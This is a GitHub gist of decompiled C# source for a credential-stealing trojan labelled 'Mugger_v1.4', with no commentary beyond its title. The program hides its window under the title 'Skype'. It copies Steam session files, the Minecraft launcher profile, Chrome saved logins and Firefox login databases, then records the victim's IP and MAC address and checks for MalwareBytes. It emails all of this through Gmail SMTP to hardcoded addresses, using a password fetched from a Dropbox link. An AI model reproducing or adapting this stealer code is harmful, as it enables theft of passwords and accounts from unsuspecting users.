-
-
Save Flakebi/59057b122ba912d8887e to your computer and use it in GitHub Desktop.
C# decompiled trojan
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
using Microsoft.VisualBasic; | |
using Microsoft.VisualBasic.CompilerServices; | |
using System; | |
using System.Collections.Generic; | |
using System.ComponentModel; | |
using System.Diagnostics; | |
using System.Drawing; | |
using System.IO; | |
using System.Net; | |
using System.Net.Mail; | |
using System.Net.NetworkInformation; | |
using System.Runtime.CompilerServices; | |
using System.Text.RegularExpressions; | |
using System.Threading; | |
using System.Timers; | |
using System.Windows.Forms; | |
using WIN3.My; | |
namespace WIN3 | |
{ | |
[DesignerGenerated] | |
public class Form1 : Form | |
{ | |
// | |
// Properties | |
// | |
internal virtual ListBox ListBox1 | |
{ | |
[DebuggerNonUserCode] | |
get | |
{ | |
return this._ListBox1; | |
} | |
[DebuggerNonUserCode] | |
[MethodImpl(MethodImplOptions.Synchronized)] | |
set | |
{ | |
this._ListBox1 = value; | |
} | |
} | |
internal virtual RichTextBox RichTextBox1 | |
{ | |
[DebuggerNonUserCode] | |
get | |
{ | |
return this._RichTextBox1; | |
} | |
[DebuggerNonUserCode] | |
[MethodImpl(MethodImplOptions.Synchronized)] | |
set | |
{ | |
EventHandler value2 = new EventHandler(this.RichTextBox1_TextChanged); | |
bool flag = this._RichTextBox1 != null; | |
if (flag) | |
{ | |
this._RichTextBox1.TextChanged -= value2; | |
} | |
this._RichTextBox1 = value; | |
flag = (this._RichTextBox1 != null); | |
if (flag) | |
{ | |
this._RichTextBox1.TextChanged += value2; | |
} | |
} | |
} | |
private virtual Timer time1 | |
{ | |
[DebuggerNonUserCode] | |
get | |
{ | |
return this._time1; | |
} | |
[DebuggerNonUserCode] | |
[MethodImpl(MethodImplOptions.Synchronized)] | |
set | |
{ | |
ElapsedEventHandler value2 = new ElapsedEventHandler(this.Timer1); | |
bool flag = this._time1 != null; | |
if (flag) | |
{ | |
this._time1.Elapsed -= value2; | |
} | |
this._time1 = value; | |
flag = (this._time1 != null); | |
if (flag) | |
{ | |
this._time1.Elapsed += value2; | |
} | |
} | |
} | |
internal virtual Timer Timer2 | |
{ | |
[DebuggerNonUserCode] | |
get | |
{ | |
return this._Timer2; | |
} | |
[DebuggerNonUserCode] | |
[MethodImpl(MethodImplOptions.Synchronized)] | |
set | |
{ | |
EventHandler value2 = new EventHandler(this.Timer2_Tick); | |
bool flag = this._Timer2 != null; | |
if (flag) | |
{ | |
this._Timer2.Tick -= value2; | |
} | |
this._Timer2 = value; | |
flag = (this._Timer2 != null); | |
if (flag) | |
{ | |
this._Timer2.Tick += value2; | |
} | |
} | |
} | |
// | |
// Constructors | |
// | |
[DebuggerNonUserCode] | |
static Form1() | |
{ | |
// Note: this type is marked as 'beforefieldinit'. | |
Form1.__ENCList = new List<WeakReference>(); | |
} | |
[DebuggerNonUserCode] | |
public Form1() | |
{ | |
base.Load += new EventHandler(this.Form1_Load); | |
Form1.__ENCAddToList(this); | |
this.InitializeComponent(); | |
} | |
// | |
// Static Methods | |
// | |
[DebuggerNonUserCode] | |
private static void __ENCAddToList(object value) | |
{ | |
List<WeakReference> _ENCList = Form1.__ENCList; | |
bool flag = false; | |
checked | |
{ | |
try | |
{ | |
Monitor.Enter(_ENCList, ref flag); | |
bool flag2 = Form1.__ENCList.Count == Form1.__ENCList.Capacity; | |
if (flag2) | |
{ | |
int num = 0; | |
int arg_44_0 = 0; | |
int num2 = Form1.__ENCList.Count - 1; | |
int num3 = arg_44_0; | |
while (true) | |
{ | |
int arg_95_0 = num3; | |
int num4 = num2; | |
if (arg_95_0 > num4) | |
{ | |
break; | |
} | |
WeakReference weakReference = Form1.__ENCList[num3]; | |
flag2 = weakReference.IsAlive; | |
if (flag2) | |
{ | |
bool flag3 = num3 != num; | |
if (flag3) | |
{ | |
Form1.__ENCList[num] = Form1.__ENCList[num3]; | |
} | |
num++; | |
} | |
num3++; | |
} | |
Form1.__ENCList.RemoveRange(num, Form1.__ENCList.Count - num); | |
Form1.__ENCList.Capacity = Form1.__ENCList.Count; | |
} | |
Form1.__ENCList.Add(new WeakReference(RuntimeHelpers.GetObjectValue(value))); | |
} | |
finally | |
{ | |
bool flag3 = flag; | |
if (flag3) | |
{ | |
Monitor.Exit(_ENCList); | |
} | |
} | |
} | |
} | |
// | |
// Methods | |
// | |
[DebuggerNonUserCode] | |
protected override void Dispose(bool disposing) | |
{ | |
try | |
{ | |
bool flag = disposing && this.components != null; | |
if (flag) | |
{ | |
this.components.Dispose(); | |
} | |
} | |
finally | |
{ | |
base.Dispose(disposing); | |
} | |
} | |
private void Form1_Load(object sender, EventArgs e) | |
{ | |
int num2; | |
int num3; | |
try | |
{ | |
IL_01: | |
int num = 1; | |
string oSFullName = MyProject.Computer.Info.OSFullName; | |
IL_15: | |
num = 2; | |
string text = Conversions.ToString(DateTime.Now); | |
IL_24: | |
num = 3; | |
bool flag = "sdsdsd".Length == 4; | |
if (flag) | |
{ | |
} | |
IL_3A: | |
IL_3B: | |
num = 5; | |
flag = ("sdsdsd".Length == 4); | |
if (flag) | |
{ | |
} | |
IL_51: | |
IL_52: | |
num = 7; | |
flag = ("sdsdsd".Length == 4); | |
if (flag) | |
{ | |
} | |
IL_68: | |
IL_69: | |
num = 9; | |
flag = ("sdsdsd".Length == 4); | |
if (flag) | |
{ | |
} | |
IL_80: | |
IL_81: | |
num = 11; | |
flag = ("sdsdsd".Length == 4); | |
if (flag) | |
{ | |
} | |
IL_98: | |
IL_99: | |
num = 13; | |
flag = ("sdsdsd".Length == 4); | |
if (flag) | |
{ | |
} | |
IL_B0: | |
IL_B1: | |
num = 15; | |
flag = ("sdsdsd".Length == 4); | |
if (flag) | |
{ | |
} | |
IL_C8: | |
IL_C9: | |
num = 17; | |
this.Hide(); | |
IL_D4: | |
num = 18; | |
this.ShowIcon = false; | |
IL_E0: | |
num = 19; | |
this.ShowInTaskbar = false; | |
IL_EC: | |
num = 20; | |
string str = Strings.Mid(Environment.GetFolderPath(Environment.SpecialFolder.System), 1, 3); | |
IL_100: | |
num = 21; | |
string userName = Environment.UserName; | |
IL_10B: | |
num = 22; | |
string temp = MyProject.Computer.FileSystem.SpecialDirectories.Temp; | |
IL_125: | |
num = 23; | |
this.Timer2.Start(); | |
IL_135: | |
num = 24; | |
MailMessage mailMessage = new MailMessage(); | |
IL_140: | |
num = 25; | |
bool flag2 = false; | |
IL_147: | |
num = 26; | |
bool flag3 = false; | |
IL_14E: | |
num = 27; | |
bool flag4 = false; | |
IL_155: | |
num = 28; | |
bool flag5 = true; | |
IL_15C: | |
num = 29; | |
bool flag6 = false; | |
IL_163: | |
num = 30; | |
IL_16A: | |
num = 31; | |
IL_171: | |
num = 32; | |
bool flag7 = false; | |
IL_178: | |
num = 33; | |
string text2 = MyProject.Computer.Info.GetType().GUID.ToString(); | |
IL_1A1: | |
num = 34; | |
string text3 = MyProject.Computer.Ports.SerialPortNames.Count.ToString(); | |
IL_1C4: | |
num = 35; | |
string text4 = Conversions.ToString(MyProject.Computer.Registry.GetValue("HKEY_LOCAL_MACHINE\Software\Wow6432Node\Valve\Steam", "Installpath", null)); | |
IL_1E9: | |
ProjectData.ClearProjectError(); | |
num2 = -2; | |
IL_1F2: | |
num = 37; | |
File.Copy(text4 + "\config\Config.vdf", temp + "\Config.vdf"); | |
IL_214: | |
num = 38; | |
File.Copy(text4 + "\config\SteamAppData.vdf", temp + "\SteamAppData.vdf"); | |
IL_236: | |
num = 39; | |
File.Copy(text4 + "\config\Loginusers.vdf", temp + "\Loginusers.vdf"); | |
IL_258: | |
ProjectData.ClearProjectError(); | |
num2 = -3; | |
IL_261: | |
num = 41; | |
DirectoryInfo directoryInfo = new DirectoryInfo(text4); | |
IL_26E: | |
num = 42; | |
FileInfo[] files = directoryInfo.GetFiles("ssfn*"); | |
IL_280: | |
num = 43; | |
FileInfo[] array = files; | |
int i = 0; | |
checked | |
{ | |
while (i < array.Length) | |
{ | |
FileInfo fileInfo = array[i]; | |
IL_297: | |
ProjectData.ClearProjectError(); | |
num2 = -4; | |
IL_2A0: | |
num = 45; | |
File.Copy(text4 + "\" + fileInfo.Name, temp + "\" + fileInfo.Name); | |
IL_2D0: | |
num = 46; | |
Attachment item = new Attachment(temp + "\" + fileInfo.Name); | |
IL_2EE: | |
num = 47; | |
mailMessage.Attachments.Add(item); | |
IL_301: | |
num = 48; | |
flag = Directory.Exists(str + "Program Files(x86)\Steam"); | |
if (flag) | |
{ | |
IL_31C: | |
num = 49; | |
flag2 = true; | |
} | |
IL_323: | |
i++; | |
IL_32A: | |
num = 51; | |
} | |
IL_340: | |
ProjectData.ClearProjectError(); | |
num2 = -5; | |
IL_349: | |
num = 53; | |
Attachment item2 = new Attachment(temp + "\Config.vdf"); | |
IL_360: | |
num = 54; | |
Attachment item3 = new Attachment(temp + "\SteamAppData.vdf"); | |
IL_377: | |
num = 55; | |
Attachment item4 = new Attachment(temp + "\Loginusers.vdf"); | |
IL_38E: | |
num = 56; | |
mailMessage.Attachments.Add(item2); | |
IL_3A1: | |
num = 57; | |
mailMessage.Attachments.Add(item3); | |
IL_3B4: | |
num = 58; | |
mailMessage.Attachments.Add(item4); | |
IL_3C7: | |
ProjectData.ClearProjectError(); | |
num2 = -6; | |
IL_3D0: | |
num = 60; | |
flag = File.Exists(str + "Users\" + Environment.UserName + "\AppData\Roaming\.minecraft\launcher_profiles.json"); | |
if (!flag) | |
{ | |
goto IL_452; | |
} | |
IL_3F5: | |
num = 61; | |
File.Copy(str + "Users\" + Environment.UserName + "\AppData\Roaming\.minecraft\launcher_profiles.json", temp + "\launcher_profiles.json"); | |
IL_421: | |
num = 62; | |
Attachment item5 = new Attachment(temp + "\launcher_profiles.json"); | |
IL_438: | |
num = 63; | |
mailMessage.Attachments.Add(item5); | |
IL_44B: | |
num = 64; | |
flag4 = true; | |
IL_452: | |
IL_453: | |
ProjectData.ClearProjectError(); | |
num2 = -7; | |
IL_45C: | |
num = 67; | |
IL_467: | |
num = 68; | |
flag = Directory.Exists(str + "Users\" + userName + "\AppData\Local\Google\Chrome\User Data\Default"); | |
if (!flag) | |
{ | |
goto IL_535; | |
} | |
IL_48C: | |
num = 69; | |
bool flag8 = File.Exists(str + "Users\" + userName + "\AppData\Local\Google\Chrome\User Data\Default\Login Data"); | |
if (!flag8) | |
{ | |
goto IL_532; | |
} | |
IL_4B1: | |
num = 70; | |
File.Decrypt(str + "Users\" + userName + "\AppData\Local\Google\Chrome\User Data\Default\Login Data"); | |
IL_4CE: | |
num = 71; | |
File.Copy(str + "Users\" + userName + "\AppData\Local\Google\Chrome\User Data\Default\Login Data", temp + "\Login Data"); | |
IL_4F7: | |
num = 72; | |
Attachment item6 = new Attachment(temp + "\Login Data"); | |
IL_50E: | |
num = 73; | |
mailMessage.Attachments.Add(item6); | |
IL_521: | |
num = 74; | |
flag6 = true; | |
IL_528: | |
num = 75; | |
Tz87fA.GetChrome(); | |
IL_532: | |
IL_533: | |
goto IL_53A; | |
IL_535: | |
num = 78; | |
IL_53A: | |
IL_53B: | |
ProjectData.ClearProjectError(); | |
num2 = -8; | |
IL_544: | |
num = 81; | |
string path = str + "Users\" + userName + "\AppData\Roaming\Mozilla\Firefox\Profiles"; | |
IL_55D: | |
ProjectData.ClearProjectError(); | |
num2 = -9; | |
IL_566: | |
num = 83; | |
string[] directories = Directory.GetDirectories(path, "*.default", SearchOption.TopDirectoryOnly); | |
IL_579: | |
num = 84; | |
string[] array2 = directories; | |
int j = 0; | |
while (j < array2.Length) | |
{ | |
string str2 = array2[j]; | |
IL_590: | |
num = 85; | |
File.Copy(str2 + "\logins.json", temp + "\logins.json"); | |
IL_5B2: | |
num = 86; | |
File.Copy(str2 + "\key3.db", temp + "\key3.db"); | |
IL_5D4: | |
num = 87; | |
Attachment item7 = new Attachment(temp + "\key3.db"); | |
IL_5EA: | |
num = 88; | |
Attachment item8 = new Attachment(temp + "\logins.json"); | |
IL_601: | |
num = 89; | |
mailMessage.Attachments.Add(item7); | |
IL_613: | |
num = 90; | |
mailMessage.Attachments.Add(item8); | |
IL_626: | |
num = 91; | |
flag8 = File.Exists(str2 + "\logins.json"); | |
if (flag8) | |
{ | |
IL_641: | |
num = 92; | |
flag3 = true; | |
} | |
IL_648: | |
j++; | |
IL_64F: | |
num = 94; | |
} | |
IL_665: | |
num = 95; | |
NetworkInterface[] allNetworkInterfaces = NetworkInterface.GetAllNetworkInterfaces(); | |
IL_670: | |
num = 96; | |
string text5 = allNetworkInterfaces[1].GetPhysicalAddress().ToString(); | |
IL_684: | |
ProjectData.ClearProjectError(); | |
num2 = -10; | |
IL_68D: | |
num = 98; | |
WebClient webClient = new WebClient(); | |
IL_698: | |
num = 99; | |
string input = webClient.DownloadString("http://whatismyipaddress.com/"); | |
IL_6AA: | |
num = 100; | |
Match match = Regex.Match(input, "href="[/]{0,}whatismyipaddress.com[/]ip[/](.{0,}?)""); | |
IL_6BC: | |
num = 101; | |
string value = match.Groups[1].Value; | |
IL_6D4: | |
num = 102; | |
string str3 = Strings.Mid(Environment.GetFolderPath(Environment.SpecialFolder.System), 1, 3); | |
IL_6E8: | |
num = 103; | |
flag8 = Directory.Exists(str3 + "Program Files\MalwareBytes Anti Exploit"); | |
if (!flag8) | |
{ | |
goto IL_70A; | |
} | |
IL_703: | |
num = 104; | |
bool flag9 = true; | |
IL_70A: | |
IL_70B: | |
num = 106; | |
string text6 = "https://www.dropbox.com"; | |
IL_716: | |
num = 107; | |
IL_721: | |
num = 108; | |
string text7 = "/s/"; | |
IL_72C: | |
num = 109; | |
string text8 = "yl1q28t"; | |
IL_737: | |
num = 110; | |
string text9 = "28n"; | |
IL_742: | |
num = 111; | |
string text10 = "mwn2p"; | |
IL_74D: | |
num = 112; | |
string text11 = "/PW.txt"; | |
IL_758: | |
num = 113; | |
string text12 = "?dl=1"; | |
IL_763: | |
num = 114; | |
IL_76E: | |
num = 115; | |
IL_779: | |
num = 116; | |
IL_784: | |
num = 117; | |
IL_78F: | |
num = 118; | |
IL_79A: | |
num = 119; | |
IL_7A5: | |
num = 120; | |
IL_7B0: | |
ProjectData.ClearProjectError(); | |
num2 = -11; | |
IL_7B9: | |
num = 122; | |
WebClient webClient2 = new WebClient(); | |
IL_7C4: | |
num = 123; | |
StreamReader streamReader = new StreamReader(webClient2.OpenRead(string.Concat(new string[] { | |
text6, | |
text7, | |
text8, | |
text10, | |
text9, | |
text11, | |
text12 | |
}))); | |
IL_816: | |
num = 124; | |
flag8 = !flag7; | |
if (!flag8) | |
{ | |
goto IL_9FB; | |
} | |
IL_828: | |
ProjectData.ClearProjectError(); | |
num2 = -12; | |
IL_831: | |
num = 126; | |
SmtpClient smtpClient = new SmtpClient("smtp.gmail.com"); | |
IL_841: | |
num = 127; | |
mailMessage.From = new MailAddress("jasonmare6@gmail.com"); | |
IL_857: | |
num = 128; | |
mailMessage.To.Add("jasonmare111@gmail.com"); | |
IL_870: | |
num = 129; | |
mailMessage.Subject = "[User- " + Environment.UserName + "] - [Mugger_v1.4] " + Conversions.ToString(DateTime.Now); | |
IL_89D: | |
num = 130; | |
mailMessage.Body = string.Concat(new string[] { | |
"==Mugger== | |
UserIP: ", | |
value, | |
" | |
UserMacaddress:", | |
text5, | |
" | |
SteamStuff Found? = ", | |
flag2.ToString(), | |
" | |
Firefox collected? = ", | |
flag3.ToString(), | |
" | |
Chrome Detected? = ", | |
flag6.ToString(), | |
" | |
", | |
oSFullName, | |
" | |
", | |
text, | |
" | |
", | |
text2, | |
" | |
MineCraft Found? = ", | |
flag4.ToString(), | |
" | |
MalwareBytes Detected?= ", | |
flag9.ToString(), | |
" | |
ChromeData: | |
", | |
this.RichTextBox1.Text | |
}); | |
IL_9A6: | |
num = 131; | |
smtpClient.Port = 587; | |
IL_9BA: | |
num = 132; | |
smtpClient.Credentials = new NetworkCredential("jasonmare6@gmail.com", streamReader.ReadToEnd()); | |
IL_9DA: | |
num = 133; | |
smtpClient.EnableSsl = true; | |
IL_9EA: | |
num = 134; | |
smtpClient.Send(mailMessage); | |
IL_9FB: | |
IL_9FC: | |
num = 136; | |
flag8 = flag5; | |
if (flag8) | |
{ | |
} | |
IL_A0B: | |
IL_A0C: | |
num = 138; | |
this.Timer2.Start(); | |
IL_A1F: | |
goto IL_CB1; | |
IL_A28:; | |
} | |
int arg_A2F_0 = num3 + 1; | |
num3 = 0; | |
switch(ICSharpCode.Decompiler.ILAst.ILLabel[], arg_A2F_0); | |
IL_C64: | |
goto IL_CA6; | |
num3 = num; | |
switch(ICSharpCode.Decompiler.ILAst.ILLabel[], (num2 > -2) ? num2 : 1); | |
IL_C82: | |
goto IL_CA6; | |
} | |
object arg_C84_0; | |
endfilter(arg_C84_0 is Exception & num2 > 0 & num3 == 0); | |
IL_CA6: | |
throw ProjectData.CreateProjectError(-2146828237); | |
IL_CB1: | |
if (num3 != 0) | |
{ | |
ProjectData.ClearProjectError(); | |
} | |
} | |
[DebuggerStepThrough] | |
private void InitializeComponent() | |
{ | |
this.components = new Container(); | |
this.Timer2 = new Timer(this.components); | |
this.ListBox1 = new ListBox(); | |
this.RichTextBox1 = new RichTextBox(); | |
this.SuspendLayout(); | |
this.Timer2.Interval = 9000; | |
this.ListBox1.FormattingEnabled = true; | |
Control arg_6D_0 = this.ListBox1; | |
Point location = new Point(0, 51); | |
arg_6D_0.Location = location; | |
this.ListBox1.Name = "ListBox1"; | |
Control arg_97_0 = this.ListBox1; | |
Size size = new Size(120, 95); | |
arg_97_0.Size = size; | |
this.ListBox1.TabIndex = 0; | |
Control arg_BD_0 = this.RichTextBox1; | |
location = new Point(126, 12); | |
arg_BD_0.Location = location; | |
this.RichTextBox1.Name = "RichTextBox1"; | |
Control arg_ED_0 = this.RichTextBox1; | |
size = new Size(286, 231); | |
arg_ED_0.Size = size; | |
this.RichTextBox1.TabIndex = 1; | |
this.RichTextBox1.Text = ""; | |
SizeF autoScaleDimensions = new SizeF(6, 13); | |
this.AutoScaleDimensions = autoScaleDimensions; | |
this.AutoScaleMode = AutoScaleMode.Font; | |
size = new Size(424, 255); | |
this.ClientSize = size; | |
this.Controls.Add(this.RichTextBox1); | |
this.Controls.Add(this.ListBox1); | |
this.Name = "Form1"; | |
this.Text = "Skype"; | |
this.ResumeLayout(false); | |
} | |
private void RichTextBox1_TextChanged(object sender, EventArgs e) | |
{ | |
} | |
private void Timer1(object obj, ElapsedEventArgs ti) | |
{ | |
} | |
private void Timer2_Tick(object sender, EventArgs e) | |
{ | |
bool isAttached = Debugger.IsAttached; | |
if (isAttached) | |
{ | |
} | |
} | |
} | |
} |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment